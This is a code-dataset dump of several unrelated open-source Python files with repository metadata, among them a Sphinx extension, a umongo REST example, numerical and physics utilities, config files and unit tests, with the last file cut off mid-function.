[Table header (flattened): hexsha | size | ext | lang | max_stars / max_issues / max_forks repo metadata (path, name, head hexsha, licenses, count, event min/max datetimes) | content | avg/max line length | alphanum_fraction | qsc_* code-quality signals | effective | hits]
hexsha: bf4f1bc2c88eea77883111bb514d3727d052d5a3 | size: 1,039 | ext: py | lang: Python
repo: bneradt/libswoc | path: doc/ext/local.py | head: 58719322a17fe020ed2340592abb30bbfba26f2f | licenses: ["Apache-2.0"]
stars: 4 (2020-05-08 to 2021-10-19) | issues: 12 (2018-12-19 to 2022-03-01) | forks: 10 (2019-04-15 to 2022-02-15)

from docutils import nodes
from docutils.parsers import rst
from sphinx.domains import Domain
import os.path


# This is a place to hang git file references.
class SWOCDomain(Domain):
    """
    Solid Wall Of Code.
    """
    name = 'swoc'
    label = 'SWOC'
    data_version = 1


def make_github_link(name, rawtext, text, lineno, inliner, options={}, content=[]):
    """
    This docutils role lets us link to source code via the handy :swoc:git: markup.
    """
    url = 'https://github.com/SolidWallOfCode/libswoc/blob/{}/{}'
    ref = 'master'
    node = nodes.reference(rawtext, os.path.basename(text), refuri=url.format(ref, text), **options)
    return [node], []


def setup(app):
    rst.roles.register_generic_role('arg', nodes.emphasis)
    rst.roles.register_generic_role('const', nodes.literal)
    rst.roles.register_generic_role('pack', nodes.strong)
    app.add_domain(SWOCDomain)
    # this lets us do :swoc:git:`<file_path>` and link to the file on github
    app.add_role_to_domain('swoc', 'git', make_github_link)
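The `:swoc:git:` role above boils down to building a GitHub blob URL and labeling the link with the file's basename. A stdlib-only sketch of that URL construction (hypothetical helper name and file path; no docutils involved):

```python
import os.path

def github_blob_url(repo_url_fmt, ref, path):
    # Returns (link label, target URL) for a source-file reference,
    # mirroring what make_github_link feeds into nodes.reference.
    return os.path.basename(path), repo_url_fmt.format(ref, path)

label, url = github_blob_url(
    'https://github.com/SolidWallOfCode/libswoc/blob/{}/{}',
    'master', 'code/src/example.cc')
print(label)  # -> example.cc
print(url)    # -> https://github.com/SolidWallOfCode/libswoc/blob/master/code/src/example.cc
```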
hexsha: bf5eb7600c6effe11ba9834981e9b94a78c72d11 | size: 630 | ext: py | lang: Python
repo: tzechiop/Traffic-Counter-Image-Analysis | path: vehicle_counter.py | head: 54fbd50ed616e9e09686b8a02debe96d584486f7 | licenses: ["MIT"]
stars: null | issues: null | forks: null

# -*- coding: utf-8 -*-
"""
Created on Mon Oct 3 21:28:05 2016
@author: thasegawa
"""
import logging
# ============================================================================
class VehicleCounter(object):
def __init__(self, shape, divider):
self.log = logging.getLogger("vehicle_counter")
self.height, self.width = shape
self.divider = divider
self.vehicle_count = 0
def update_count(self, matches, output_image = None):
self.log.debug("Updating count using %d matches...", len(matches))
# ============================================================================
hexsha: bf601bab0eabedcbb63dd95b687c310892810533 | size: 8,130 | ext: py | lang: Python
repo: javdrher/umongo | path: examples/muffin/app.py | head: 7eef315cea588c4c22815effbd1e4d8c571e8aa7 | licenses: ["MIT"]
stars: null | issues: null | forks: null

import json
import datetime
import muffin
from bson import ObjectId
from aiohttp.web import json_response
from motor.motor_asyncio import AsyncIOMotorClient
from functools import partial
from umongo import Instance, Document, fields, ValidationError, set_gettext
from umongo.marshmallow_bonus import SchemaFromUmongo

import logging
logging.basicConfig(level=logging.DEBUG)


app = muffin.Application(__name__,
                         PLUGINS=(
                             'muffin_babel',
                         ),
                         BABEL_LOCALES_DIRS=['translations'])
db = AsyncIOMotorClient()['demo_umongo']
instance = Instance(db)
set_gettext(app.ps.babel.gettext)


@app.ps.babel.locale_selector
def set_locale(request):
    """Get locale based on request Accept-Language header"""
    return app.ps.babel.select_locale_by_request(request)


class MongoJsonEncoder(json.JSONEncoder):
    def default(self, obj):
        if isinstance(obj, (datetime.datetime, datetime.date)):
            return obj.isoformat()
        elif isinstance(obj, ObjectId):
            return str(obj)
        return json.JSONEncoder.default(self, obj)


def jsonify(request, *args, **kwargs):
    """
    jsonify with support for MongoDB ObjectId
    """
    dumps = partial(json.dumps, cls=MongoJsonEncoder, indent=True)
    return json_response(dict(*args, **kwargs), dumps=dumps)


@instance.register
class User(Document):
    nick = fields.StrField(required=True, unique=True)
    firstname = fields.StrField()
    lastname = fields.StrField()
    birthday = fields.DateTimeField()
    password = fields.StrField()  # Don't store it in clear in real life !


async def populate_db():
    await User.collection.drop()
    await User.ensure_indexes()
    for data in [
        {
            'nick': 'mze', 'lastname': 'Mao', 'firstname': 'Zedong',
            'birthday': datetime.datetime(1893, 12, 26),
            'password': 'Serve the people'
        },
        {
            'nick': 'lsh', 'lastname': 'Liu', 'firstname': 'Shaoqi',
            'birthday': datetime.datetime(1898, 11, 24),
            'password': 'Dare to think, dare to act'
        },
        {
            'nick': 'lxia', 'lastname': 'Li', 'firstname': 'Xiannian',
            'birthday': datetime.datetime(1909, 6, 23),
            'password': 'To rebel is justified'
        },
        {
            'nick': 'ysh', 'lastname': 'Yang', 'firstname': 'Shangkun',
            'birthday': datetime.datetime(1907, 7, 5),
            'password': 'Smash the gang of four'
        },
        {
            'nick': 'jze', 'lastname': 'Jiang', 'firstname': 'Zemin',
            'birthday': datetime.datetime(1926, 8, 17),
            'password': 'Seek truth from facts'
        },
        {
            'nick': 'huji', 'lastname': 'Hu', 'firstname': 'Jintao',
            'birthday': datetime.datetime(1942, 12, 21),
            'password': 'It is good to have just 1 child'
        },
        {
            'nick': 'xiji', 'lastname': 'Xi', 'firstname': 'Jinping',
            'birthday': datetime.datetime(1953, 6, 15),
            'password': 'Achieve the 4 modernisations'
        }
    ]:
        await User(**data).commit()


# Create a custom marshmallow schema from User document in order to avoid some fields
class UserNoPassSchema(User.schema.as_marshmallow_schema()):
    class Meta:
        read_only = ('password',)
        load_only = ('password',)

no_pass_schema = UserNoPassSchema()


def dump_user_no_pass(u):
    return no_pass_schema.dump(u).data


@app.register('/', methods=['GET'])
async def root(request):
    return """<h1>Umongo muffin example</h1>
<br>
<h3>routes:</h3><br>
<ul>
  <li><a href="/users">GET /users</a></li>
  <li>POST /users</li>
  <li>GET /users/&lt;nick_or_id&gt;</li>
  <li>PATCH /users/&lt;nick_or_id&gt;</li>
  <li>DELETE /users/&lt;nick_or_id&gt;</li>
  <li>PUT /users/&lt;nick_or_id&gt;/password</li>
</ul>
"""


def _to_objid(data):
    try:
        return ObjectId(data)
    except Exception:
        return None


def _nick_or_id_lookup(nick_or_id):
    return {'$or': [{'nick': nick_or_id}, {'_id': _to_objid(nick_or_id)}]}


def build_error(status=400, msg=None):
    if status == 404 and not msg:
        msg = 'Not found'
    return json_response({'message': msg}, status=status)


@app.register('/users/{nick_or_id}', methods=['GET'])
async def get_user(request):
    nick_or_id = request.match_info['nick_or_id']
    user = await User.find_one(_nick_or_id_lookup(nick_or_id))
    if not user:
        return build_error(404)
    return jsonify(request, dump_user_no_pass(user))


@app.register('/users/{nick_or_id}', methods=['PATCH'])
async def update_user(request):
    nick_or_id = request.match_info['nick_or_id']
    payload = await request.json()
    if payload is None:
        return build_error(400, 'Request body must be json with Content-type: application/json')
    user = await User.find_one(_nick_or_id_lookup(nick_or_id))
    if not user:
        return build_error(404)
    # Define a custom schema from the default one to ignore read-only fields
    UserUpdateSchema = User.schema.as_marshmallow_schema(params={
        'password': {'dump_only': True},
        'nick': {'dump_only': True}
    })
    # with `strict`, marshmallow raises a ValidationError if something is wrong
    schema = UserUpdateSchema(strict=True)
    try:
        data, _ = schema.load(payload)
        user.update(data)
        await user.commit()
    except ValidationError as ve:
        return build_error(400, ve.args[0])
    return jsonify(request, dump_user_no_pass(user))


@app.register('/users/{nick_or_id}', methods=['DELETE'])
async def delete_user(request):
    nick_or_id = request.match_info['nick_or_id']
    user = await User.find_one(_nick_or_id_lookup(nick_or_id))
    if not user:
        return build_error(404)
    try:
        await user.remove()
    except ValidationError as ve:
        return build_error(400, ve.args[0])
    return 'Ok'


@app.register('/users/{nick_or_id}/password', methods=['PUT'])
async def change_password_user(request):
    nick_or_id = request.match_info['nick_or_id']
    payload = await request.json()
    if payload is None:
        return build_error(400, 'Request body must be json with Content-type: application/json')
    user = await User.find_one(_nick_or_id_lookup(nick_or_id))
    if not user:
        return build_error(404, 'Not found')

    # Use a field from our document to create a marshmallow schema
    # Note that we use `SchemaFromUmongo` to get unknown fields check on
    # deserialization and skip missing fields instead of returning None
    class ChangePasswordSchema(SchemaFromUmongo):
        password = User.schema.fields['password'].as_marshmallow_field(params={'required': True})

    # with `strict`, marshmallow raises a ValidationError if something is wrong
    schema = ChangePasswordSchema(strict=True)
    try:
        data, _ = schema.load(payload)
        user.password = data['password']
        await user.commit()
    except ValidationError as ve:
        return build_error(400, ve.args[0])
    return jsonify(request, dump_user_no_pass(user))


@app.register('/users', methods=['GET'])
async def list_users(request):
    page = int(request.GET.get('page', 1))
    per_page = 10
    cursor = User.find(limit=per_page, skip=(page - 1) * per_page)
    return jsonify(request, {
        '_total': (await cursor.count()),
        '_page': page,
        '_per_page': per_page,
        '_items': [dump_user_no_pass(u) for u in (await cursor.to_list(per_page))]
    })


@app.register('/users', methods=['POST'])
async def create_user(request):
    payload = await request.json()
    if payload is None:
        return build_error(400, 'Request body must be json with Content-type: application/json')
    try:
        user = User(**payload)
        await user.commit()
    except ValidationError as ve:
        return build_error(400, ve.args[0])
    return jsonify(request, dump_user_no_pass(user))


if __name__ == '__main__':
    import asyncio
    loop = asyncio.get_event_loop()
    loop.run_until_complete(populate_db())
    # Needed to bootstrap plugins
    loop.run_until_complete(app.start())
    from aiohttp import web
    web.run_app(app, port=5000)
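The `MongoJsonEncoder` in the umongo example above plugs into `json.dumps` through the `cls` argument. A stdlib-only demonstration of the same pattern for datetimes (the `ObjectId` branch is omitted so the snippet runs without `bson`; `DateTimeEncoder` is a hypothetical name):

```python
import json
import datetime

class DateTimeEncoder(json.JSONEncoder):
    def default(self, obj):
        # Serialize dates as ISO-8601 strings; defer everything else
        # to the base class, which raises TypeError for unknown types.
        if isinstance(obj, (datetime.datetime, datetime.date)):
            return obj.isoformat()
        return json.JSONEncoder.default(self, obj)

doc = {"nick": "mze", "birthday": datetime.date(1893, 12, 26)}
print(json.dumps(doc, cls=DateTimeEncoder))  # -> {"nick": "mze", "birthday": "1893-12-26"}
```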
hexsha: bf64e15c2ae7fbe778bd815cba2fe89218f46d8c | size: 1,284 | ext: py | lang: Python
repo: AaronDJohnson/fbtpoint | path: flux/trapezoidal.py | head: d5f84006b7b5a53cbf92a9e763f8a6913b86233e | licenses: ["MIT"]
stars: 1 (2021-01-19) | issues: null | forks: null

import numpy as np
def trapezoidal_rule(f, a, b, tol=1e-8):
    """
    The trapezoidal rule is known to be very accurate for
    oscillatory integrals integrated over their period.
    See papers on spectral integration (it's just the composite trapezoidal rule....)

    TODO (aaron): f is memoized to get the already computed points quickly.
    Ideally, we should put this into a C++ function and call it with Cython. (Maybe someday)
    """
    # endpoints first:
    num = 2
    dx = b - a
    res0 = 1e30
    res1 = 0.5 * dx * (f(b) + f(a))
    delta_res = res0 - res1
    re_err = np.abs(np.real(delta_res))
    im_err = np.abs(np.imag(delta_res))
    while re_err > tol or im_err > tol:
        res0 = res1
        num = 2 * num - 1
        # print(num)
        x = np.linspace(a, b, num=num)
        res = 0
        dx = (x[1] - x[0])
        res += f(x[0])
        for i in range(1, len(x) - 1):
            res += 2 * f(x[i])
        res += f(x[-1])
        res1 = 0.5 * dx * res
        delta_res = res1 - res0
        re_err = np.abs(np.real(delta_res))
        im_err = np.abs(np.imag(delta_res))
        if num > 100000:
            print('Integral failed to converge with', num, 'points.')
            return np.nan, np.nan, np.nan
    return res1, re_err, im_err
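The core of `trapezoidal_rule` is the composite trapezoidal rule; the function above wraps it in adaptive refinement with separate real/imaginary error tracking. A minimal pure-Python sketch of just the quadrature step (hypothetical helper name `trapezoid`, fixed point count, no complex bookkeeping):

```python
import math

def trapezoid(f, a, b, num=1001):
    # Composite trapezoidal rule on `num` equally spaced points:
    # endpoints weighted 1/2, interior points weighted 1.
    dx = (b - a) / (num - 1)
    total = 0.5 * (f(a) + f(b))
    for i in range(1, num - 1):
        total += f(a + i * dx)
    return dx * total

# Integrating x**2 over [0, 1]; exact value is 1/3.
approx = trapezoid(lambda x: x * x, 0.0, 1.0)
print(abs(approx - 1.0 / 3.0) < 1e-6)  # -> True
```

As the docstring above notes, for a periodic integrand sampled over a full period (e.g. `math.sin` over `[0, 2*pi]`) this simple rule converges spectrally fast, which is why it is used for oscillatory flux integrals.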
hexsha: bf6bba62cfa86d75f46fc7260c7fa058af76ac89 | size: 2,897 | ext: py | lang: Python
repo: chinhtle/ops-restd | path: opsrest/custom/basecontroller.py | head: ab3599a0b8b4df99c35b3f99de6948b2c41630d5 | licenses: ["Apache-2.0"]
stars: null | issues: null | forks: null

# Copyright (C) 2015-2016 Hewlett Packard Enterprise Development LP
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.

from opsrest.constants import\
    REST_VERSION_PATH, OVSDB_SCHEMA_SYSTEM_URI, OVSDB_SCHEMA_CONFIG
from opsrest.exceptions import MethodNotAllowed, NotFound
from opsrest.patch import create_patch, apply_patch
from tornado import gen


class BaseController():
    """
    BaseController base controller class with generic
    CRUD operations.
    """

    def __init__(self, context=None):
        self.base_uri_path = ""
        self.context = context
        self.initialize()

    def initialize(self):
        pass

    @gen.coroutine
    def create(self, data, current_user=None, query_args=None):
        raise MethodNotAllowed

    @gen.coroutine
    def update(self, item_id, data, current_user=None, query_args=None):
        raise MethodNotAllowed

    @gen.coroutine
    def delete(self, item_id, current_user=None, query_args=None):
        raise MethodNotAllowed

    @gen.coroutine
    def get(self, item_id, current_user=None, selector=None, query_args=None):
        raise MethodNotAllowed

    @gen.coroutine
    def get_all(self, current_user=None, selector=None, query_args=None):
        raise MethodNotAllowed

    @gen.coroutine
    def create_uri(self, item_id):
        return REST_VERSION_PATH + OVSDB_SCHEMA_SYSTEM_URI + "/" +\
            self.base_uri_path + "/" + item_id

    @gen.coroutine
    def patch(self, item_id, data, current_user=None, query_args=None):
        try:
            # Get the resource's JSON to patch
            resource_json = self.get(item_id, current_user,
                                     OVSDB_SCHEMA_CONFIG)
            if resource_json is None:
                raise NotFound
            # Create and verify patch
            (patch, needs_update) = create_patch(data)
            # Apply patch to the resource's JSON
            patched_resource = apply_patch(patch, resource_json)
            # Update resource only if needed, since a valid
            # patch can contain PATCH_OP_TEST operations
            # only, which do not modify the resource
            if needs_update:
                self.update(item_id, patched_resource, current_user)
        # In case the resource doesn't implement GET/PUT
        except MethodNotAllowed:
            raise MethodNotAllowed("PATCH not allowed on resource")
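The create-patch/apply-patch flow in `BaseController.patch()` above follows the JSON Patch model (RFC 6902): `test` operations only verify values, while `replace` operations actually modify the document. A minimal stdlib-only sketch for flat, top-level paths (hypothetical helper, not the real `opsrest.patch` implementation):

```python
def apply_simple_patch(ops, doc):
    # Applies a flat-path subset of RFC 6902 ops and returns a patched copy.
    # Only "test" and "replace" are handled; nested paths are out of scope.
    result = dict(doc)
    for op in ops:
        key = op["path"].lstrip("/")
        if op["op"] == "test":
            if result.get(key) != op["value"]:
                raise ValueError("test op failed for %s" % key)
        elif op["op"] == "replace":
            result[key] = op["value"]
        else:
            raise ValueError("unsupported op: %s" % op["op"])
    return result

patched = apply_simple_patch(
    [{"op": "test", "path": "/divider", "value": 10},
     {"op": "replace", "path": "/divider", "value": 20}],
    {"divider": 10})
print(patched["divider"])  # -> 20
```

This also illustrates why the controller tracks `needs_update`: a patch consisting only of `test` operations leaves the document unchanged, so no write is necessary.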
hexsha: bf6c8896b3823d91e05bd42f0104f9e302b14adf | size: 1,417 | ext: py | lang: Python
repo: Purva-Chaudhari/cmssw | path: RecoLocalCalo/Configuration/python/ecalLocalRecoSequenceCosmics_cff.py | head: 32e5cbfe54c4d809d60022586cf200b7c3020bcf | licenses: ["Apache-2.0"]
stars: 852 (2015-01-11 to 2022-03-25) | issues: 30,371 (2015-01-02 to 2022-03-31) | forks: 3,240 (2015-01-02 to 2022-03-31)

import FWCore.ParameterSet.Config as cms
# Calo geometry service model
#
# removed by tommaso
#
# ECAL conditions
# include "CalibCalorimetry/EcalTrivialCondModules/data/EcalTrivialCondRetriever.cfi"
#
# TPG condition needed by ecalRecHit producer if TT recovery is ON
from RecoLocalCalo.EcalRecProducers.ecalRecHitTPGConditions_cff import *

# ECAL reconstruction
from RecoLocalCalo.EcalRecProducers.ecalWeightUncalibRecHit_cfi import *
from RecoLocalCalo.EcalRecProducers.ecalFixedAlphaBetaFitUncalibRecHit_cfi import *
from RecoLocalCalo.EcalRecProducers.ecalRecHit_cff import *

ecalRecHit.cpu.EBuncalibRecHitCollection = 'ecalFixedAlphaBetaFitUncalibRecHit:EcalUncalibRecHitsEB'
ecalRecHit.cpu.EEuncalibRecHitCollection = 'ecalFixedAlphaBetaFitUncalibRecHit:EcalUncalibRecHitsEE'
ecalRecHit.cpu.ChannelStatusToBeExcluded = [
    'kDAC',
    'kNoLaser',
    'kNoisy',
    'kNNoisy',
    'kFixedG6',
    'kFixedG1',
    'kFixedG0',
    'kNonRespondingIsolated',
    'kDeadVFE',
    'kDeadFE',
    'kNoDataNoTP'
]

from RecoLocalCalo.EcalRecProducers.ecalPreshowerRecHit_cfi import *
from RecoLocalCalo.EcalRecProducers.ecalDetIdToBeRecovered_cfi import *

ecalLocalRecoTaskCosmics = cms.Task(
    ecalFixedAlphaBetaFitUncalibRecHit,
    ecalWeightUncalibRecHit,
    ecalDetIdToBeRecovered,
    ecalCalibratedRecHitTask,
    ecalPreshowerRecHit
)

ecalLocalRecoSequenceCosmics = cms.Sequence(ecalLocalRecoTaskCosmics)
hexsha: bf714ad8fd6286252d03542ce325ec9f5d78e4a5 | size: 2,375 | ext: py | lang: Python
repo: johnmwangi/Gallery_jpG | path: photoapp/tests.py | head: e8c9874cbedf519c522f7e313a3bdfd6ea193cbf | licenses: ["MIT"]
stars: null | issues: 5 (2021-03-19 to 2022-03-11) | forks: null

from django.test import TestCase
from .models import *

# Create your tests here.


class ImageTest(TestCase):

    # class instance setup for the tests
    def setUp(self):
        self.nairobi = Location(name='nairobi')
        self.nairobi.save()

        self.nature = Category(name='nature')
        self.nature.save()

        self.new_image = Image(name="New Image", description="An Image", location=self.nairobi, category=self.nature)
        self.new_image.save()

    # a testcase for an instance of the Image class
    def test_instance(self):
        self.new_image.save()
        self.assertTrue(isinstance(self.new_image, Image))

    # def test_delete_image(self):
    #     self.drinks.save()
    #     self.drinks.delete()
    #     self.assertTrue(len(Image.objects.all()) == 0)
    #
    # def test_update(self):
    #     self.drinks.save()
    #     self.drinks.name = 'MoreDrinks'
    #     self.assertTrue(self.drinks.name == 'MoreDrinks')
    #
    # def test_all_images(self):
    #     self.drinks.save()
    #     images = Image.all_images()
    #     self.assertTrue(len(images) > 0)
    #
    # def test_search_by_category(self):
    #     self.drinks.save()
    #     images = Image.search_by_category('fun')
    #     self.assertTrue(len(images) > 0)
    #
    # def test_view_location(self):
    #     self.drinks.save()
    #     location = Image.view_location(self.nairobi)
    #     self.assertTrue(len(location) > 0)
    #
    # def test_view_category(self):
    #     self.drinks.save()
    #     categories = Image.view_category(self.music)
    #     self.assertTrue(len(categories) > 0)


class CategoriesTest(TestCase):
    def setUp(self):
        self.nature = Category(name='nature')

    def test_instance(self):
        self.nature.save()
        self.assertTrue(isinstance(self.nature, Category))

    def test_save(self):
        self.nature.save_category()
        categories = Category.objects.all()
        self.assertTrue(len(categories) > 0)


class LocationTest(TestCase):
    def setUp(self):
        self.nairobi = Location(name='nairobi')

    def test_instance(self):
        self.nairobi.save()
        self.assertTrue(isinstance(self.nairobi, Location))

    def test_save(self):
        self.nairobi.save_location()
        locations = Location.objects.all()
        self.assertTrue(len(locations) > 0)
hexsha: bf78aaaa0acb465353b273336d13b89d4bd83f96 | size: 1,176 | ext: py | lang: Python
path: tests/config/test_structure.py | licenses: ["Apache-2.0"]
stars: 178 (2017-07-22 to 2022-03-28, repo gcollard/lightbus, head d04deeda8ccef5a582b79255725ca2025a085c02) | issues: 26 (2017-08-03 to 2021-10-19, repo adamcharnock/warren, head 5e7069da06cd37a8131e8c592ee957ccb73603d5) | forks: 19 (2017-09-15 to 2022-02-28, repo adamcharnock/warren)

import pytest
from lightbus.config.structure import make_transport_selector_structure, ApiConfig, RootConfig

pytestmark = pytest.mark.unit


def test_make_transport_config_structure():
    EventTransportSelector = make_transport_selector_structure("event")
    assert "redis" in EventTransportSelector.__annotations__


def test_make_api_config_structure():
    assert "event_transport" in ApiConfig.__annotations__
    assert "rpc_transport" in ApiConfig.__annotations__
    assert "result_transport" in ApiConfig.__annotations__
    assert "validate" in ApiConfig.__annotations__


def test_root_config_service_name():
    service_name = RootConfig().service_name
    assert service_name
    assert type(service_name) == str
    assert len(service_name) > 3
    # No format parameters in there, should have been formatted upon instantiation
    assert "{" not in service_name


def test_root_config_process_name():
    process_name = RootConfig().process_name
    assert process_name
    assert type(process_name) == str
    assert len(process_name) > 3
    # No format parameters in there, should have been formatted upon instantiation
    assert "{" not in process_name
hexsha: bf7bb0df2ea5bd1508b28ac03700685986a30403 | size: 3,565 | ext: py | lang: Python
repo: DataBiosphere/bond | path: main.py | head: 8459ea2f2a1f0b4e7c9c5e3c4e6361cf71e45ecd | licenses: ["BSD-3-Clause"]
stars: 2 (2018-05-29 to 2020-01-16) | issues: 45 (2018-06-07 to 2021-05-27) | forks: 2 (2018-05-31 to 2020-03-06)

import logging
import logging.config
import os
import flask
import google.cloud.logging
import yaml
from flask_cors import CORS
from google.auth.credentials import AnonymousCredentials
from google.cloud import ndb
from bond_app import routes
from bond_app.json_exception_handler import JsonExceptionHandler
from bond_app.swagger_ui import swaggerui_blueprint, SWAGGER_URL
client = None
if os.environ.get('DATASTORE_EMULATOR_HOST'):
# If we're running the datastore emulator, we should use anonymous credentials to connect to it.
# The project should match the project given to the Datastore Emulator. See tests/datastore_emulator/run_emulator.sh
client = ndb.Client(project="test", credentials=AnonymousCredentials())
else:
# Otherwise, create a client grabbing credentials normally from cloud environment variables.
client = ndb.Client()
def ndb_wsgi_middleware(wsgi_app):
"""Wrap an app so that each request gets its own NDB client context."""
def middleware(environ, start_response):
with client.context():
return wsgi_app(environ, start_response)
return middleware
def setup_logging():
"""
If we are running as a GAE application, we need to set up Stackdriver logging.
Stackdriver logging will encounter errors if it doesn't have access to the right project credentials.
Proceeds to load the custom logging configuration for the app.
:return:
"""
default_log_level = logging.DEBUG
if os.environ.get('GAE_APPLICATION'):
# Connects the logger to the root logging handler; by default this captures
# all logs at INFO level and higher
logging_client = google.cloud.logging.Client()
logging_client.setup_logging(log_level=default_log_level)
# Default logging config to be used if we fail reading from the file
logging_config = {"version": 1,
"disable_existing_loggers": False,
"root": {
"level": default_log_level
}
}
log_config_file_path = 'log_config.yaml'
try:
with open(log_config_file_path, 'rt') as f:
logging_config = yaml.safe_load(f.read())
logging.debug("Successfully read Logging Config from: {}".format(log_config_file_path))
except Exception:
# TODO: How do we determine what specific exception types to handle here?
logging.basicConfig(level=default_log_level)
logging.exception("Error trying to configure logging with file: {}. Using default settings."
.format(log_config_file_path))
logging.config.dictConfig(logging_config)
def create_app():
"""Initializes app."""
flask_app = flask.Flask(__name__)
flask_app.register_blueprint(routes.routes)
flask_app.register_blueprint(swaggerui_blueprint, url_prefix=SWAGGER_URL)
CORS(flask_app)
return flask_app
# Logging setup/config should happen as early as possible so that we can log using our desired settings. If you want to
# log anything in this file, make sure you call `setup_logging()` first and then get the right logger as follows:
# logger = logging.getLogger(__name__)
setup_logging()
app = create_app()
app.wsgi_app = ndb_wsgi_middleware(app.wsgi_app) # Wrap the app in middleware.
handler = JsonExceptionHandler(app)
@app.after_request
def add_nosniff_content_type_header(response):
response.headers["X-Content-Type-Options"] = "nosniff"
response.headers["X-Frame-Options"] = "deny"
return response
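`ndb_wsgi_middleware` above follows the standard WSGI-middleware pattern: every request runs inside a fresh client context. A minimal stdlib-only sketch of the same pattern — the `FakeClient` and `demo_app` here are illustrative stand-ins for the NDB client and the Flask app, not part of Bond:

```python
from contextlib import contextmanager

class FakeClient:
    """Stand-in for ndb.Client: records how often a context was opened."""
    def __init__(self):
        self.contexts_opened = 0

    @contextmanager
    def context(self):
        self.contexts_opened += 1
        yield

client = FakeClient()

def demo_app(environ, start_response):
    # A trivial WSGI app standing in for the Flask app.
    start_response('200 OK', [('Content-Type', 'text/plain')])
    return [b'ok']

def ndb_wsgi_middleware(wsgi_app):
    """Wrap an app so that each request gets its own client context."""
    def middleware(environ, start_response):
        with client.context():
            return wsgi_app(environ, start_response)
    return middleware

wrapped = ndb_wsgi_middleware(demo_app)
body = wrapped({}, lambda status, headers: None)
```

Because the context is opened per call, each request gets its own scope — the same reason Bond wraps `app.wsgi_app` rather than opening one global context at startup.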
# src/couplib/constants.py | DKosenkov/PyFREC | MIT
import math
#-------------------------------------------------------------------------------
# Conversion factors
ATOB = 1.889725989 #Angstrom to Bohr Conversion
BTOA = 1.0/ATOB
HartreeToKCal = 627.509
HartreeToCM1 = 219474.629232
HartreeToeV = 27.211215
eVToHartree = 1/HartreeToeV
#eVToCM1_old = 8065.54429 #web
#eVToCM1 = 8065.54400479571 #our
TimeAuToS = 2.418884326505E-17 #Atomic unit of time to seconds
qe = 1.6021766208E-19 #Charge of an electron / coulombs
c = 299792458 #Speed of light / m/s
h = 6.626070040E-34 #Planck constant Jxs
eVToCM1 = qe/(100*h*c)
c_au = 137.035999139 #Speed of light 1/alpha = 1/(Fine-structure constant) in atomic units
Bohr_Radius_m = 5.2917721092E-11 # Bohr radius in meters
TDM_auToDebye = 2.541746 # (Transition) Dipole Moment atomic units (a.u. or ea0) to Debye
#1 Debye = 0.393430307 a.u.
#1 TDM a.u. = 2.541746 Debye
GAS_CONST_CM1_K = 0.69465783 #Gas constant in cm-1/K
#Quantum dynamics:
cm1_to_ps1_by_hbar1 = 2*1.0e2*math.pi*c*1.0e-12 #approximate value of the conversion factor: 0.19 (1 cm-1 = ps-1/h_bar)
cm1_to_ps1 = 1.0e2*c*1.0e-12 #approximate value of the conversion factor: 0.029 (1 cm-1 = 0.03 ps)
#Conversion of GROMACS GRO files in nm to ang
nm_to_ang = 10.0
#Conversion factor CM-1 = CM1_NM/nm; nm = CM1_NM/cm-1
CM1_NM = 1.0E7
AVOGADROS_Na = 6.0221415E23 #Avogadro's constant per mole
#-------------------------------------------------------------------------------
ELEMENTS_BY_ATOMIC_N = ['X','H','He',
'Li','Be','B','C','N','O','F','Ne',
'Na','Mg','Al','Si','P','S','Cl','Ar',
'K','Ca','Sc','Ti','V','Cr','Mn','Fe','Co','Ni','Cu','Zn','Ga','Ge','As','Se','Br','Kr',
'Rb','Sr','Y','Zr','Nb','Mo','Tc','Ru','Rh','Pd','Ag','Cd','In','Sn','Sb','Te','I','Xe',
'Cs','Ba','La','Ce','Pr','Nd','Pm','Sm','Eu','Gd','Tb','Dy','Ho','Er','Tm','Yb','Lu','Hf','Ta','W','Re','Os','Ir','Pt','Au','Hg','Tl','Pb','Bi','Po','At','Rn',
'Fr','Ra','Ac','Th','Pa','U','Np','Pu','Am','Cm','Bk','Cf','Es','Fm','Md','No','Lr','Rf','Db','Sg','Bh','Hs','Mt','Ds','Rg','Cn','Uut','Fl','Uup','Lv','Uus','Uuo']
#-------------------------------------------------------------------------------
RE_FLOAT = r'[-]?\d+(?:\.\d+)?|\.\d+' #Regular expression to match float numbers
RE_DOUBLE = r'[+\-]?(?:0|[1-9]\d*)(?:\.\d*)?(?:[eED][+\-]?\d+)?'
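Several of the factors above are derived from physical constants rather than hard-coded, which makes them easy to sanity-check numerically (the constants are restated here so the snippet runs standalone):

```python
qe = 1.6021766208E-19  # charge of an electron / C
c = 299792458          # speed of light / m/s
h = 6.626070040E-34    # Planck constant / J*s

# 1 eV in wavenumbers: E = h*c*k  =>  k = qe/(h*c), with the factor 100 converting m^-1 to cm^-1
eVToCM1 = qe / (100 * h * c)

# 1 cm^-1 in ps^-1 (without the 2*pi factor): 1e2 * c * 1e-12
cm1_to_ps1 = 1.0e2 * c * 1.0e-12
```

The derived `eVToCM1` reproduces the commented-out literal value 8065.544 to the precision quoted in the file.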
# tests/test_molecule.py | zig1000/schem | MIT
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pathlib import Path
import pickle
from timeit import Timer
import unittest
import sys
# Insert the parent directory to sys path so schem is accessible even if it's not available system-wide
sys.path.insert(1, str(Path(__file__).parent.parent))
from schem.molecule import Molecule
num_subtests = 0
LAST_TEST_RESULTS = {}
def percent_diff_str(last_metric, cur_metric):
'''Provide a % indicator, colored red or green if the given metric significantly changed.'''
percent_diff = (cur_metric - last_metric) / last_metric
percent_formatting = ''
if percent_diff <= -0.05:
percent_formatting = '\033[92m' # green
elif percent_diff >= 0.05:
percent_formatting = '\033[91m' # red
if percent_diff >= 0:
percent_formatting += '+'
format_end = '\033[0m'
return f'{percent_formatting}{percent_diff:.0%}{format_end}'
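The helper above colors a metric delta with ANSI escape codes; its exact output can be checked directly (the function is restated so the snippet is self-contained):

```python
def percent_diff_str(last_metric, cur_metric):
    '''Provide a % indicator, colored red or green if the given metric significantly changed.'''
    percent_diff = (cur_metric - last_metric) / last_metric
    percent_formatting = ''
    if percent_diff <= -0.05:
        percent_formatting = '\033[92m'  # green
    elif percent_diff >= 0.05:
        percent_formatting = '\033[91m'  # red
    if percent_diff >= 0:
        percent_formatting += '+'
    format_end = '\033[0m'
    return f'{percent_formatting}{percent_diff:.0%}{format_end}'

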